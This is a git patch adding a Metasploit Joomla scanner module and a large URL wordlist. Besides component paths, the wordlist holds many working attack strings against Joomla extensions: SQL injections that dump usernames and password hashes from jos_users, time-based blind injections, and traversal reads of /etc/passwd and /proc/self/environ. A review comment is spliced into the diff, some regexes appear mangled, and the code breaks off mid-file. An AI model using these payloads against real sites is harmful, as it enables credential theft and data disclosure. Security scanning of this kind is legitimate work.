From 0b61d28e0ee433e9a9daf9f411b61993e30c5baa Mon Sep 17 00:00:00 2001
From: f8lerror
Date: Thu, 17 Jan 2013 11:36:59 -0500
Subject: [PATCH 1/7] added Joomla scanner and url wordlist

---
 data/wordlists/pcheck.txt | 627 ++++++++++++++++++
 .../auxiliary/scanner/http/joomla_vulnscan.rb | 270 ++++
 2 files changed, 897 insertions(+)
 create mode 100755 data/wordlists/pcheck.txt
 create mode 100755 modules/auxiliary/scanner/http/joomla_vulnscan.rb

diff --git a/data/wordlists/pcheck.txt b/data/wordlists/pcheck.txt
new file mode 100755
index 0000000000..b65dd2a422
--- /dev/null
+++ b/data/wordlists/pcheck.txt
@@ -0,0 +1,627 @@ +&controller=../../../../../../../../../../../../[LFI]%00 +?1.5.10-x +?1.5.11-x-http_ref +?1.5.11-x-php-s3lf +?1.5.3-path-disclose +?1.5.3-spam +?1.5.8-x +?1.5.9-x +?j1012-fixate-session +?option=com_mysms&Itemid=0&task=phonebook +Joomla_1.6.0-Alpha2-Full-Package/components/com_mailto/assets/close-x.png +admin/ +administrator/ +administrator/components/ +administrator/components/com_a6mambocredits/ +administrator/components/com_a6mambohelpdesk/ +administrator/components/com_admin/admin.admin.html.php +administrator/components/com_astatspro/refer.php +administrator/components/com_bayesiannaivefilter/ +administrator/components/com_chronocontact/excelwriter/PPS/File.php +administrator/components/com_colophon/ +administrator/components/com_colorlab/ +administrator/components/com_comprofiler/ +administrator/components/com_comprofiler/plugin.class.php +administrator/components/com_cropimage/admin.cropcanvas.php +administrator/components/com_extplorer/ +administrator/components/com_feederator/includes/tmsp/add_tmsp.php +administrator/components/com_googlebase/ +administrator/components/com_installer +administrator/components/com_jcs/ +administrator/components/com_jim/ +administrator/components/com_jjgallery/ +administrator/components/com_joom12pic/ +administrator/components/com_joomla-visites/ +administrator/components/com_joomla_flash_uploader/ +administrator/components/com_joomlaflashfun/ +administrator/components/com_joomlaradiov5/ +administrator/components/com_jpack/ +administrator/components/com_jreactions/ +administrator/components/com_juser/ +administrator/components/com_admin/ +administrator/components/com_kochsuite / +administrator/components/com_linkdirectory/ +administrator/components/com_livechat/getSavedChatRooms.php +administrator/components/com_livechat/xmlhttp.php +administrator/components/com_lurm_constructor/admin.lurm_constructor.php 
+administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=lo.php"); +administrator/components/com_mambelfish/ +administrator/components/com_mgm/ +administrator/components/com_mmp/help.mmp.php +administrator/components/com_mosmedia/ +administrator/components/com_multibanners/extadminmenus.class.php +administrator/components/com_panoramic/ +administrator/components/com_peoplebook/param.peoplebook.php +administrator/components/com_phpshop/toolbar.phpshop.html.php +administrator/components/com_remository/admin.remository.php +administrator/components/com_serverstat/install.serverstat.php +administrator/components/com_simpleswfupload/uploadhandler.php"); +administrator/components/com_swmenupro/ +administrator/components/com_treeg/ +administrator/components/com_uhp/ +administrator/components/com_uhp2/ +administrator/components/com_webring/ +administrator/components/com_wmtgallery/ +administrator/components/com_wmtportfolio/ +administrator/components/com_x-shop/ +administrator/index.php?option=com_djartgallery&task=editItem&cid[]=1'+and+1=1+--+ +administrator/index.php?option=com_searchlog&act=log +ajaxim/ +akocomments.php +cart?Itemid=[SQLi] +component/com__brightweblinks/ +component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/directory,1/Itemid,0 +component/osproperty/?task=agent_register +component/quran/index.php?option=com_quran&action=viewayat&surano= +components/com_ clickheat/ +components/com_5starhotels/ +components/com_Jambook/jambook.php +components/com_a6mambocredits/ +components/com_a6mambohelpdesk/ +components/com_ab_gallery/ +components/com_acajoom/ +components/com_acctexp/ +components/com_aclassf/ +components/com_activities/ +components/com_actualite/ +components/com_admin/admin.admin.html.php +components/com_advancedpoll/ +components/com_agora/ +components/com_agoragroup/ +components/com_ajaxchat/ +components/com_akobook/ +components/com_akocomment/ +components/com_akogallery 
+components/com_alberghi/ +components/com_allhotels/ +components/com_alphacontent/ +components/com_altas/ +components/com_amocourse/ +components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php +components/com_articles/ +components/com_artist/ +components/com_artlinks/ +components/com_asortyment/ +components/com_astatspro/ +components/com_awesom/ +components/com_babackup/ +components/com_banners/ +components/com_bayesiannaivefilter/ +components/com_be_it_easypartner/ +components/com_beamospetition/ +components/com_biblestudy/ +components/com_biblioteca/views/biblioteca/tmpl/pdf.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23 +components/com_biblioteca/views/biblioteca/tmpl/stampa.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23 +components/com_blog/ +components/com_bookflip/ +components/com_bookjoomlas/ +components/com_booklibrary/ +components/com_books/ +components/com_bsadv/ +components/com_bsq_sitestats/ +components/com_bsq_sitestats/external/rssfeed.php +components/com_bsqsitestats/ +components/com_calendar/ +components/com_camelcitydb2/ +components/com_candle/ +components/com_casino_blackjack/ +components/com_casino_videopoker/ +components/com_casinobase/ +components/com_catalogproduction/ +components/com_catalogshop/ +components/com_category/ +components/com_cgtestimonial/video.php?url="> +components/com_chronocontact/excelwriter/PPS/File.php +components/com_cinema/ +components/com_clasifier/ +components/com_classifieds/ +components/com_clickheat/ +components/com_cloner/ +components/com_cmimarketplace/ +components/com_cms/ +components/com_colophon/ +components/com_colorlab/ +components/com_competitions/ +components/com_comprofiler/ +components/com_comprofiler/plugin.class.php +components/com_contactinfo/ +components/com_content/ +components/com_cpg/cpg.php +components/com_cropimage/admin.cropcanvas.php +components/com_custompages/ +components/com_cx/ 
+components/com_d3000/ +components/com_dadamail/ +components/com_dailymessage/ +components/com_datsogallery/ +components/com_dbquery/ +components/com_detail/ +components/com_digistore/ +components/com_directory/ +components/com_djiceshoutbox/ +components/com_doc/ +components/com_downloads/ +components/com_ds-syndicate/ +components/com_dtregister/ +components/com_dv/externals/phpupload/upload.php"); +components/com_easybook/ +components/com_emcomposer/ +components/com_equotes/ +components/com_estateagent/ +components/com_eventing/ +components/com_eventlist/ +components/com_events/ +components/com_ewriting/ +components/com_expose/uploadimg.php +components/com_expshop/ +components/com_extcalendar/ +components/com_extcalendar/cal_popup.php?extmode=view&extid= +components/com_extcalendar/extcalendar.php +components/com_extended_registration/registration_detailed.inc.php +components/com_extplorer/ +components/com_ezine/ +components/com_ezstore/ +components/com_facileforms/ +components/com_fantasytournament/ +components/com_faq/ +components/com_feederator/includes/tmsp/add_tmsp.php +components/com_filebase/ +components/com_filiale/ +components/com_flashfun/ +components/com_flashmagazinedeluxe/ +components/com_flippingbook/ +components/com_flyspray/startdown.php +components/com_fm/fm.install.php +components/com_foevpartners/ +components/com_football/ +components/com_formtool/ +components/com_forum/ +components/com_fq/ +components/com_fundraiser/ +components/com_galeria/ +components/com_galleria/galleria.html.php +components/com_gallery/ +components/com_game/ +components/com_gameq/ +components/com_garyscookbook/ +components/com_genealogy/ +components/com_geoboerse/ +components/com_gigcal/ +components/com_gmaps/ +components/com_googlebase/ +components/com_gsticketsystem/ +components/com_guide/ +components/com_hashcash/server.php +components/com_hbssearch/ +components/com_hello_world/ +components/com_hotproperties/ +components/com_hotproperty/ +components/com_hotspots/ 
+components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php +components/com_hwdvideoshare/ +components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jqUploader=1"); +components/com_ice/ +components/com_idoblog/ +components/com_idvnews/ +components/com_ignitegallery/ +components/com_ijoomla_archive/ +components/com_ijoomla_rss/ +components/com_inter/ +components/com_ionfiles/ +components/com_is/ +components/com_ixxocart/ +components/com_jabode/ +components/com_jashowcase/ +components/com_jb2/ +components/com_jce/ +components/com_jcs/ +components/com_jd-wiki/ +components/com_jd-wp/ +components/com_jim/ +components/com_jjgallery/ +components/com_jmovies/ +components/com_jobline/ +components/com_jombib/ +components/com_joobb/ +components/com_jooget/ +components/com_joom12pic/ +components/com_joomla-visites/ +components/com_joomla_flash_uploader/ +components/com_joomlaboard/ +components/com_joomladate/ +components/com_joomlaflashfun/ +components/com_joomlalib/ +components/com_joomlaradiov5/ +components/com_joomlavvz/ +components/com_joomlaxplorer/ +components/com_joomloads/ +components/com_joomradio/ +components/com_joomtracker/ +components/com_joovideo/ +components/com_jotloader/ +components/com_journal/ +components/com_jpack/ +components/com_jpad/ +components/com_jreactions/ +components/com_jreviews/scripts/xajax.inc.php +components/com_jumi/ +components/com_juser/ +components/com_jvideo/ +components/com_k2/ +components/com_kbase/ +components/com_knowledgebase/fckeditor/fckeditor.js +components/com_kochsuite / +components/com_kunena/ +components/com_letterman/ +components/com_lexikon/ +components/com_linkdirectory/ +components/com_listoffreeads/ +components/com_livechat/getSavedChatRooms.php +components/com_livechat/xmlhttp.php +components/com_liveticker/ +components/com_lm/ +components/com_lmo/ +components/com_loudmounth/includes/abbc/abbc.class.php +components/com_loudmouth/ +components/com_lowcosthotels/ 
+components/com_lurm_constructor/admin.lurm_constructor.php +components/com_mad4joomla/ +components/com_madeira/img.php +components/com_maianmusic/ +components/com_mailarchive/ +components/com_mailto/ +components/com_mambatstaff/mambatstaff.php +components/com_mambelfish/ +components/com_mambospgm/ +components/com_mambowiki/MamboLogin.php +components/com_marketplace/ +components/com_mcquiz/ +components/com_mdigg/ +components/com_media_library/ +components/com_mediaslide/ +components/com_mezun/ +components/com_mgm/ +components/com_minibb/ +components/com_misterestate/ +components/com_mmp/help.mmp.php +components/com_model/ +components/com_moodle/moodle.php +components/com_moofaq/ +components/com_mosmedia/ +components/com_mospray/scripts/admin.php +components/com_mosres/ +components/com_most/ +components/com_mp3_allopass/ +components/com_mtree/ +components/com_mtree/img/listings/o/{id}.php +components/com_multibanners/extadminmenus.class.php +components/com_myalbum/ +components/com_mycontent/ +components/com_mydyngallery/ +components/com_mygallery/ +components/com_n-forms/ +components/com_na_content/ +components/com_na_mydocs/ +components/com_na_newsdescription/ +components/com_na_qforms/ +components/com_neogallery/ +components/com_neorecruit/ +components/com_neoreferences/ +components/com_netinvoice/ +components/com_news/ +components/com_news_portal/ +components/com_newsflash/ +components/com_nfn_addressbook/ +components/com_nicetalk/ +components/com_noticias/ +components/com_omnirealestate/ +components/com_omphotogallery/ +components/com_ongumatimesheet20/ +components/com_onlineflashquiz/ +components/com_ownbiblio/ +components/com_panoramic/ +components/com_paxgallery/ +components/com_paxxgallery/ +components/com_pcchess/ +components/com_pcchess/include.pcchess.php +components/com_pccookbook/ +components/com_pccookbook/pccookbook.php +components/com_peoplebook/param.peoplebook.php +components/com_performs/ +components/com_philaform/ 
+components/com_phocadocumentation/ +components/com_php/ +components/com_phpshop/toolbar.phpshop.html.php +components/com_pinboard/ +components/com_pms/ +components/com_poll/ +components/com_pollxt/ +components/com_ponygallery/ +components/com_portafolio/ +components/com_portfol/ +components/com_prayercenter/ +components/com_pro_desk/ +components/com_prod/ +components/com_productshowcase/ +components/com_profiler/ +components/com_projectfork/ +components/com_propertylab/ +components/com_puarcade/ +components/com_publication/ +components/com_quiz/ +components/com_rapidrecipe/ +components/com_rdautos/ +components/com_realestatemanager/ +components/com_recly/ +components/com_referenzen/ +components/com_rekry/ +components/com_remository/admin.remository.php +components/com_remository_files/file_image_14/1276100016shell.php +components/com_reporter/processor/reporter.sql.php +components/com_resman/ +components/com_restaurante/ +components/com_ricette/ +components/com_rsfiles/ +components/com_rsgallery/ +components/com_rsgallery2/ +components/com_rss/ +components/com_rssreader/ +components/com_rssxt/ +components/com_rwcards/ +components/com_school/ +components/com_search/ +components/com_sebercart/getPic.php?p=[LFD]%00 +components/com_securityimages/ +components/com_sef/ +components/com_seminar/ +components/com_serverstat/install.serverstat.php +components/com_sg/ +components/com_simple_review/ +components/com_simpleboard/ +components/com_simplefaq/ +components/com_simpleshop/ +components/com_sitemap/sitemap.xml.php +components/com_slideshow/ +components/com_smf/ +components/com_smf/smf.php +components/com_swmenupro/ +components/com_team/ +components/com_tech_article/ +components/com_thopper/ +components/com_thyme/ +components/com_tickets/ +components/com_tophotelmodule/ +components/com_tour_toto/ +components/com_trade/ +components/com_uhp/ +components/com_uhp2/ +components/com_user/controller.php +components/com_users/ 
+components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php +components/com_vehiclemanager/ +components/com_versioning / +components/com_videodb/core/videodb.class.xml.php +components/com_virtuemart/ +components/com_volunteer/ +components/com_vr/ +components/com_waticketsystem/ +components/com_webhosting/ +components/com_weblinks/ +components/com_webring/ +components/com_wmtgallery/ +components/com_wmtportfolio/ +components/com_x-shop/ +components/com_xevidmegahd/ +components/com_xewebtv/ +components/com_xfaq/ +components/com_xgallery/helpers/img.php?file= +components/com_xsstream-dm/ +components/com_ynews/ +components/com_yvcomment/ +components/com_zoom/classes/ +components/mod_letterman/ +components/remository/ +eXtplorer/ +easyblog/entry/uncategorized +extplorer/ +http://{target}/components/com_mtree/img/listings/o/{id}.php where {id} +includes/joomla.php +index.php/404' +index.php/?option=com_question&catID=21' and+1=0 union all +index.php/image-gallery/">/25-koala +index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&type=css&v=1 +index.php?option=com_aardvertiser&cat_name=Vehicles'+AND+'1'='1&task=view +index.php?option=com_aardvertiser&cat_name=conf&task=<= +index.php?option=com_aardvertiser&task= +index.php?option=com_abc&view=abc&letter=AS§ionid=' +index.php?option=com_advert&id=36' +index.php?option=com_alameda&controller=comments&task=edit&storeid=-1+union+all+select+concat_ws(0x3a,username,password)+from+jos_users-- +index.php?option=com_alfurqan15x&action=viewayat&surano= +index.php?option=com_amblog&view=amblog&catid=-1 UNION SELECT @@version +index.php?option=com_annonces&view=edit&Itemid=1 +index.php?option=com_articleman&task=new +index.php?option=com_bbs&bid=-1 +index.php?option=com_beamospetition&startpage=3&pet=- +index.php?option=com_beamospetition&startpage=3&pet=-1+Union+select+user()+from+jos_users- +index.php?option=com_bearleague&task=team&tid=8&sid=1&Itemid=%27 
+index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_biblioteca&view=biblioteca&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23 +index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=-1 +index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+jos_users-- +index.php?option=com_chronoconnectivity&itemid=1 +index.php?option=com_chronocontact&itemid=1 +index.php?option=com_cinema&Itemid=S@BUN&func=detail&id= +index.php?option=com_clantools&squad=1+ +index.php?option=com_clantools&task=clanwar&showgame=1+ +index.php?option=com_commedia&format=raw&task=image&pid=4&id=964' +index.php?option=com_commedia&task=page&commpid=21 +index.php?option=com_connect&view=connect&controller= +index.php?option=com_content&view=article&id=[A VALID ID]&Itemid=[A VALID ID]&sflaction=dir&sflDir=../../../ +index.php?option=com_delicious&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_dioneformwizard&controller=[LFI]%00 +index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=-1 +index.php?option=com_dshop&controller=fpage&task=flypage&idofitem=12 +index.php?option=com_easyfaq&Itemid=1&task=view&gid= +index.php?option=com_easyfaq&catid=1&task=view&id=-2527+ +index.php?option=com_easyfaq&task=view&contact_id= +index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id= +index.php?option=com_equipment&task=components&id=45&sec_men_id= +index.php?option=com_equipment&view=details&id= +index.php?option=com_estateagent&Itemid=47&act=object&task=showEO&id=[sqli] +index.php?option=com_etree&view=displays&layout=category&id=[SQL] +index.php?option=com_etree&view=displays&layout=user&user_id=[SQL] 
+index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1 +index.php?option=com_fabrik&view=table&tableid=13+union+select+1---- +index.php?option=com_filecabinet&task=download&cid[]=7 +index.php?option=com_firmy&task=section_show_set&Id=-1 +index.php?option=com_fss&view=test&prodid=777777.7'+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cversion()%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--+D4NB4R +index.php?option=com_golfcourseguide&view=golfcourses&cid=1&id= +index.php?option=com_graphics&controller= +index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0&data_search= +index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0?data_search=&rpp= +index.php?option=com_huruhelpdesk&view=detail +index.php?option=com_huruhelpdesk&view=detail&cid[0]= +index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1 +index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=1 +index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=2 +index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id[]=1 +index.php?option=com_iproperty&view=agentproperties&id= +index.php?option=com_jacomment&view= +index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00 +index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00 +index.php?option=com_jcommunity&controller=members&task=1' +index.php?option=com_jeajaxeventcalendar&view=alleventlist_more&event_id=-13 +index.php?option=com_jefaqpro&view=category&layout=categorylist&catid=2 +index.php?option=com_jefaqpro&view=category&layout=categorylist&task=lists&catid=2 +index.php?option=com_jeguestbook&view=../../../../../../../../etc/passwd%00 +index.php?option=com_jeguestbook&view=item_detail&d_itemid=-1 OR (SELECT(IF(0x41=0x41, BENCHMARK(999999999,NULL),NULL))) +index.php?option=com_jfuploader&Itemid= +index.php?option=com_jgen&task=view&id= 
+index.php?option=com_jgrid&controller=../../../../../../../../etc/passwd%00 +index.php?option=com_jimtawl&Itemid=12&task= +index.php?option=com_jmarket&controller=product&task=1' +index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=1' +index.php?option=com_jomdirectory&task=search&type=111+ +index.php?option=com_joomdle&view=detail&cat_id=1&course_id= +index.php?option=com_joomla_flash_uploader&Itemid=1 +index.php?option=com_joomleague&func=showNextMatch&p=[sqli] +index.php?option=com_joomleague&view=resultsmatrix&p=4&Itemid=[sqli] +index.php?option=com_joomtouch&controller= +index.php?option=com_jphone&controller../../../../../../../../../../etc/passwd%00 +index.php?option=com_jphone&controller../../../../../../../../../../proc/self/environ%00 +index.php?option=com_jscalendar&view=jscalendar&task=details&ev_id=999 UNION SELECT 1,username,password,4,5,6,7,8 FROM jos_users +index.php?option=com_jstore&controller=product-display&task=1' +index.php?option=com_jsubscription&controller=subscription&task=1' +index.php?option=com_jtickets&controller=ticket&task=1' +index.php?option=com_konsultasi&act=detail&sid= +index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en +index.php?option=com_kunena&func=userlist&search= +index.php?option=com_lead&task=display&archive=1&Itemid=65&leadstatus=1' +index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_markt&page=show_category&catid=7+union+select+0,1,password,3,4,5,username,7,8+from+jos_users-- +index.php?option=com_matamko&controller= +index.php?option=com_myhome&task=4&nidimmindex.php?option=com_myhome&task=4&nidimm +index.php?option=com_neorecruit&task=offer_view&id= +index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users-- +index.php?option=com_noticeboard&controller= 
+index.php?option=com_obsuggest&controller= +index.php?option=com_ongallery&task=ft&id=-1+order+by+1-- +index.php?option=com_ongallery&task=ft&id=-1+union+select+1-- +index.php?option=com_oziogallery&Itemid= +index.php?option=com_page&id=53 +index.php?option=com_pbbooking&task=validate&id=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(999999999,NULL),NULL))) +index.php?option=com_pcchess&controller=../../../../../../../../../../../../../etc/passwd%00 +index.php?option=com_peliculas&view=peliculas&id=null[Sql Injection] +index.php?option=com_phocagallery&view=categories&Itemid= +index.php?option=com_photomapgallery&view=imagehandler&folder=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) +index.php?option=com_php&file=../../../../../../../../../../etc/passwd +index.php?option=com_php&file=../images/phplogo.jpg +index.php?option=com_php&file=../js/ie_pngfix.js +index.php?option=com_ponygallery&Itemid=[sqli] +index.php?option=com_products&catid=-1 +index.php?option=com_products&id=-1 +index.php?option=com_products&product_id=-1 +index.php?option=com_products&task=category&catid=-1 +index.php?option=com_properties&task=agentlisting&aid= +index.php?option=com_qcontacts&Itemid=1' +index.php?option=com_qcontacts?=catid=0&filter_order=[SQLi]&filter_order_Dir=&option=com_qcontacts +index.php?option=com_record&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_restaurantguide&view=country&id='&Itemid=69 +index.php?option=com_rokmodule&tmpl=component&type=raw&module=1' +index.php?option=com_seyret&view= +index.php?option=com_simpleshop&Itemid=26&task=viewprod&id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users-- +index.php?option=com_smartsite&controller= +index.php?option=com_spa&view=spa_product&cid= +index.php?option=com_spidercalendar +index.php?option=com_spidercalendar&date=1' 
+index.php?option=com_spielothek&task=savebattle&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) +index.php?option=com_spielothek&view=battle&wtbattle=ddbdelete&dbtable=vS&loeschen[0]=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) +index.php?option=com_spielothek&view=battle&wtbattle=play&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) +index.php?option=com_staticxt&staticfile=test.php&id=1923 +index.php?option=com_szallasok&mode=8&id=25 (SQL) +index.php?option=com_tag&task=tag&tag= +index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+concat_ws(0x3a,username,password),2,3,4,5,6+from+jos_users-- +index.php?option=com_timetrack&view=timetrack&ct_id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,CONCAT(username,0x3A,password) FROM jos_users +index.php?option=com_ultimateportfolio&controller= +index.php?option=com_users&view=registration +index.php?option=com_virtuemart&page=account.index&keyword=[sqli] +index.php?option=com_worldrates&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_x-shop&action=artdetail&idd=' +index.php?option=com_x-shop&action=artdetail&idd='[SQLi] +index.php?option=com_xcomp&controller=../../[LFI]%00 +index.php?option=com_xvs&controller=../../[LFI]%00 +index.php?option=com_yellowpages&cat=-1923+UNION+SELECT 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--+Union+select+user()+from+jos_users-- +index.php?option=com_yjcontactus&view= +index.php?option=com_youtube&id_cate=4 +index.php?option=com_zina&view=zina&Itemid=9 +index.php?option=com_zoomportfolio&view=portfolio&view=portfolio&id= +index.php?search=NoGe&option=com_esearch&searchId= +index.php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube 
+index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7+from+jos_users-- +js/index.php?option=com_socialads&view=showad&Itemid=94 +libraries/joomla/utilities/compat/php50x.php +libraries/pcl/pcltar.php +libraries/phpmailer/phpmailer.php +libraries/phpxmlrpc/xmlrpcs.php +modules/mod_artuploader/upload.php"); +modules/mod_as_category.php +modules/mod_calendar.php +modules/mod_ccnewsletter/helper/popup.php?id=[SQLi] +modules/mod_dionefileuploader/upload.php?module_dir=./&module_max=2097152&file_type=application/octet-stream"); +modules/mod_jfancy/script.php"); +modules/mod_ppc_simple_spotlight/elements/upload_file.php +modules/mod_ppc_simple_spotlight/img/ +modules/mod_pxt/ +modules/mod_quick_question.php +modules/mod_visitorsgooglemap/map_data.php?action=listpoints&lastMarkerID=0 +patch/makedown.php?arquivo=../../../../etc/passwd +plugins/content/efup_files/helper.php"); +plugins/editors/idoeditor/themes/advanced/php/image.php" method="post" enctype="multipart/form-data"> +plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/ +plugins/editors/xstandard/attachmentlibrary.php +print.php?task=person&id=36 and 1=1 +templates/be2004-2/ +templates/ja_purity/ +wap/wapmain.php?option=onews&action=link&id=-154+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1-- +web/index.php?option=com_rokmodule&tmpl=component&type=raw&module=1' \ No newline at end of file diff --git a/modules/auxiliary/scanner/http/joomla_vulnscan.rb b/modules/auxiliary/scanner/http/joomla_vulnscan.rb new file mode 100755 index 0000000000..c8cbfbae27 --- /dev/null +++ b/modules/auxiliary/scanner/http/joomla_vulnscan.rb 
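Review bot: A number of entries in this list are not request paths but copy-paste artifacts, and the module that consumes it appears to pass each chomped line on unchanged (`papp = bapp.chomp` in the next file), so these will be sent as malformed URIs and generate noise rather than findings. Visible examples are lines ending in `");` such as `administrator/components/com_simpleswfupload/uploadhandler.php");`, the HTML fragment `plugins/editors/idoeditor/themes/advanced/php/image.php" method="post" enctype="multipart/form-data">`, the template `http://{target}/components/com_mtree/img/listings/o/{id}.php where {id}`, paths with embedded spaces like `components/com_kochsuite /`, and `index.php?option=com_myhome&task=4&nidimmindex.php?option=com_myhome&task=4&nidimm`, which looks like two lines fused. Those should be trimmed to the path component or dropped, and a short header comment should say that the list deliberately mixes plugin directories with full `index.php?...` query strings, since the option is documented only as "list of plugins". The file is also created with mode 100755; a wordlist does not need the executable bit.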
@@ -0,0 +1,270 @@ +## +# $Id: joomla_vulnscan.rb +## +## +#Thanks to @zeroSteiner @kaospunk helping with examples and questions. Also thanks to Joomscan and various MSF modules for code examples. +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + + def initialize + super( + 'Name' => 'Joomla Scanner', + 'Version' => '$Revision: 14774 $', + 'Description' => %q{ + This module scans the Joomla install for information and potential vulnerabilites. + }, + 'Author' => [ 'f8lerror' ], + 'License' => MSF_LICENSE + ) + register_options( + [ + OptString.new('PATH', [ true, "The path to the Joomla install", '/']), + OptBool.new('ENUMERATE', [ false, "Enumerate Plugins", true]), + + OptPath.new('PLUGINS', [ false, "Path to list of plugins to enumerate", + File.join(Msf::Config.install_root, "data", "wordlists", "pcheck.txt") + ] + ) + + ], self.class) + end + + def osfingerprint(response) + if(response.headers.has_key?('Server') ) + if(response.headers['Server'] =~/Win32/ or response.headers['Server'] =~ /\(Windows/ or response.headers['Server'] =~ /IIS/) + os = "Windows" + elsif(response.headers['Server'] =~ /Apache\// and response.headers['Server'] !~/(Win32)/) + os = "*Nix" + else + os = "Unknown Server Header Reporting: "+response.headers['Server'] + end + end + return os + end + def fingerprint(response, app) + + if(response.body =~ /(.+)<\/version\/?>/i) + v = $1 + out = (v =~ /^6/) ? 
"Joomla #{v}" : " #{v}" + elsif(response.body =~ /system\.css 20196 2011\-01\-09 02\:40\:25Z ian/ or + response.body =~ /MooTools\.More\=\{version\:\"1\.3\.0\.1\"/ or + response.body =~ /en-GB\.ini 20196 2011\-01\-09 02\:40\:25Z ian/ or + response.body =~ /en-GB\.ini 20990 2011\-03\-18 16\:42\:30Z infograf768/ or + response.body =~/20196 2011\-01\-09 02\:40\:25Z ian/) + out = "1.6" + elsif(response.body =~ /system\.css 21322 2011\-05\-11 01\:10\:29Z dextercowley / or + response.body =~ /MooTools\.More\=\{version\:\"1\.3\.2\.1\"/ or response.body =~ /22183 2011\-09\-30 09\:04\:32Z infograf768/ or response.body =~ /21660 2011\-06\-23 13\:25\:32Z infograf768/) + out = "1.7" + elsif(response.body =~ /Joomla! 1.5/ or + response.body =~ /MooTools\=\{version\:\'1\.12\'\}/ or response.body =~ /11391 2009\-01\-04 13\:35\:50Z ian/) + out = "1.5" + elsif(response.body =~ /Copyright \(C\) 2005 \- 2012 Open Source Matters/ or + response.body =~ /MooTools.More\=\{version\:\"1\.4\.0\.1\"/ ) + out = "2.5" + elsif(response.body =~ /\s+ tpath, + 'method' => 'GET', + }, 5) + return if not bres or not bres.body or not bres.code + bres.body.gsub!(/[\r|\n]/, ' ') + File.open(datastore['PLUGINS'], 'rb').each_line do |bapp| + papp = bapp.chomp + plugin_search(tpath,papp,ip,bres) + end + end + + end + def check_app(tpath, app, ip) + res = send_request_cgi({ + 'uri' => tpath+app, + 'method' => 'GET', + }, 5) + return if not res or not res.body or not res.code + res.body.gsub!(/[\r|\n]/, ' ') + os = osfingerprint(res) + if (res.code.to_i == 200) + out = fingerprint(res,app) + return if not out + if(out =~ /Unknown Joomla/) + print_error("Unable to identify Joomla Version with this file #{app}") + return false + else + print_good("Joomla Version:#{out} from: #{app} ") + print_good("OS: #{os}") + report_note( + :host => ip, + :port => datastore['RPORT'], + :proto => 'http', + :ntype => 'Joomla Version', + :data => out + ) + return true + end + elsif(res.code.to_i == 403 and 
datastore['VERBOSE'])
